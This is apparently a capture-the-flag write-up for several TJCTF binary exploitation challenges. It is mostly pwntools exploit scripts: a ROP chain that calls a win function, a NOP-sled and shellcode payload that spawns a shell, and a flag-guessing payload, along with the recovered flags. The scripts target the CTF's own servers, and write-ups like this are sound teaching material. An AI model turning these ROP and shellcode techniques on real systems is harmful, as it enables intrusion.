dplastico

Heap Challenge

By debugging and reading the source code, you can observe an attack path: changing the size to 0xa0 and then allocating the same size (with 0x98) will print the data 0x20 bytes after the chunk, where the flag should be. tjctf{bby-eap-lol171296386}, exploited mannually with netcat

Ring Opening

A simple ROP:

#!/usr/bin/python3
from pwn import *
gs = '''
b main
continue
'''
elf = context.binary = ELF('./out')
context.terminal = ['tmux', 'splitw', '-hp', '70']

def start():
    if args.GDB:
        return gdb.debug('./out', gdbscript=gs)
    if args.REMOTE:

        return remote('tjc.tf', 31457)
    else:
        return process('./out')
r = start()
r.timeout = 1
#========= exploit here ===================
libc = elf.libc
#0x0000000000401016: ret
poprdi = 0x0040117a
ret = 0x401016

payload = b"A"*0x10
payload += p64(poprdi)
payload += p64(0xdeadbeef)
payload += p64(elf.sym.win)

r.sendline(payload)

#========= interactive ====================
r.interactive()

#tjctf{bby-rop-1823721665as87d86a5}

Sled

A jmp and shellcode easy challenge:

#!/usr/bin/python3
from pwn import *
gs = '''
b main
continue
'''
elf = context.binary = ELF('./out')
context.terminal = ['tmux', 'splitw', '-hp', '70']

def start():
    if args.GDB:
        return gdb.debug('./out', gdbscript=gs)
    if args.REMOTE:
        return remote('tjc.tf', 31456)
    else:
        return process('./out')
r = start()
#========= exploit here ===================
payload = asm('''
    mov rdx, 0x401136
    call rdx
    ''')

print(hex(len((payload))))

r.sendline(payload)
payload = b"\x90"*0x20
payload += asm(shellcraft.sh())
r.sendline(payload)

#========= interactive ====================
r.interactive()
#tjctf{bby-shhEellLcodeeeeeaf7af7f66}

WtTwo

You can observe the flag in memory and just send it to print the flag remotely:

#!/usr/bin/python3
from pwn import *
gs = '''
b *main +430
continue
'''
elf = context.binary = ELF('./wttwo')
context.terminal = ['tmux', 'splitw', '-hp', '70']

def start():
    if args.GDB:
        return gdb.debug('./wttwo', gdbscript=gs)
    if args.REMOTE:
        return remote('127.0.0.1', 5555)
    else:
        return process('./wttwo')
r = start()
#========= exploit here ===================

payload = b"t"
payload += b"j"
payload += b"c"
payload += b"t"
payload += b"f"
payload += b"{"
payload += b"w"
payload += b"t"
payload += b"-"
payload += b"t"
payload += b"h"
payload += b"e"
payload += b"-"
payload += b"t"
payload += b"w"
payload += b"o"
payload += b"o"
payload += b"o"
payload += b"o"
payload += b"o"
payload += b"a"
payload += b"s"
payload += b"4"
payload += b"8"
payload += b"%"
payload += b"@"
payload += b"d"
payload += b"f"
payload += b"s"
payload += b"}"
payload += b"A"*(30-len(payload))
print(payload)
r.sendlineafter(b"Guess my flag!!", payload)

#========= interactive ====================
r.interactive()